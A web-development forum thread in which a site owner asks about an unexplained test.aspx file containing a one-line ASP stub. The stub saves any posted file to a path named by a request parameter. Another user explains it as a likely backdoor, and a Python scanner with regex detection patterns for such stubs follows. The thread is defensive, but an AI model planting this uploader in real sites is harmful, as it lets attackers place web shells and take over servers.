Last post Nov 04, 2013 05:44 PM by AceCorban
Nov 04, 2013 04:44 PM|carlos16|LINK
A file was uploaded to my site somehow and had the following code. What does this mean?
<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>
Nov 04, 2013 04:56 PM|AceCorban|LINK
This code checks to see if there is an HttpPostedFile in the Request Object, and if so, it saves it to the directory indicated by the querystring (or POST) parameter "f".
You are saying this file was uploaded to your site and it wasn't you? Does your site offer the ability to upload? This could be the start of someone trying to create a backdoor into your site.
Is this the only line in the file? What is it called?
Nov 04, 2013 05:06 PM|carlos16|LINK
Thanks for the reply... Yes, the file is called test.aspx... I do not have any upload ability on the site... I do allow the admin people to upload images only. How otherwise could a file be uploaded to my site?
Nov 04, 2013 05:19 PM|AceCorban|LINK
Not exactly sure. Are you sure only images can be uploaded by admins? I had an issue a while back when a vulnerability in Plesk allowed someone to upload a modified version of jquery to my site which was employing an XSS technique to redirect my users.
That wasn't something I could fix in code as the exploit never went through my code. Hopefully some security experts on this can shed some light on this, because this seems like a pretty simple exploit...
Nov 04, 2013 05:38 PM|carlos16|LINK
Well, the site is hosted on Windows/IIS 6 on farm hosting... Even to get to the admin area you must log in. Any help will be
Nov 04, 2013 05:44 PM|AceCorban|LINK
Well, to start, see what you can do to circumvent your own security checks (try to access the page that has upload in it whilst not logged in, try to upload a similar aspx page, etc).
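A detection sketch for the one-line uploader quoted in the first post, added here as an example and not code from anyone in the thread: it walks a web root and flags script files that save a posted file to a path taken from a request parameter. The regexes, function names and the two sample files written by `demo()` are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Extensions that IIS hands to ASP.NET or classic ASP for execution.
SCRIPT_EXTS = {".aspx", ".ashx", ".asmx", ".asp"}
# Heuristics for the stub on this page: posted file saved to a request-supplied path.
SAVEAS = re.compile(r"Request\.Files\b.*?\.SaveAs\s*\(", re.I | re.S)
REQ_PATH = re.compile(r"MapPath\s*\(\s*Request\s*[\(\[\.]", re.I)

def scan_file(path):
    """Return the reasons (possibly none) this file looks like an upload stub."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    reasons = []
    if SAVEAS.search(text):
        reasons.append("saves a posted file (Request.Files ... SaveAs)")
    if REQ_PATH.search(text):
        reasons.append("destination path comes from a request parameter")
    return reasons

def scan_webroot(root):
    """Walk root and return {relative_path: reasons} for flagged script files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCRIPT_EXTS:
                continue  # static content is not executed by the server
            full = os.path.join(dirpath, name)
            reasons = scan_file(full)
            if reasons:
                findings[os.path.relpath(full, root)] = reasons
    return findings

def demo():
    """Scan a constructed web root: the stub from this thread plus a benign page."""
    stub = ('<% If Request.Files.Count <> 0 Then '
            'Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>')
    benign = '<%@ Page Language="VB" %><html><body>Hello</body></html>'
    with tempfile.TemporaryDirectory() as root:
        for rel, body in (("test.aspx", stub), ("default.aspx", benign)):
            with open(os.path.join(root, rel), "w") as fh:
                fh.write(body)
        return scan_webroot(root)

if __name__ == "__main__":
    for path, reasons in demo().items():
        print(path, "->", "; ".join(reasons))
```

A hit is a lead to review, not proof of compromise; comparing file timestamps and the web server logs for requests to the flagged path helps establish when and how the file arrived.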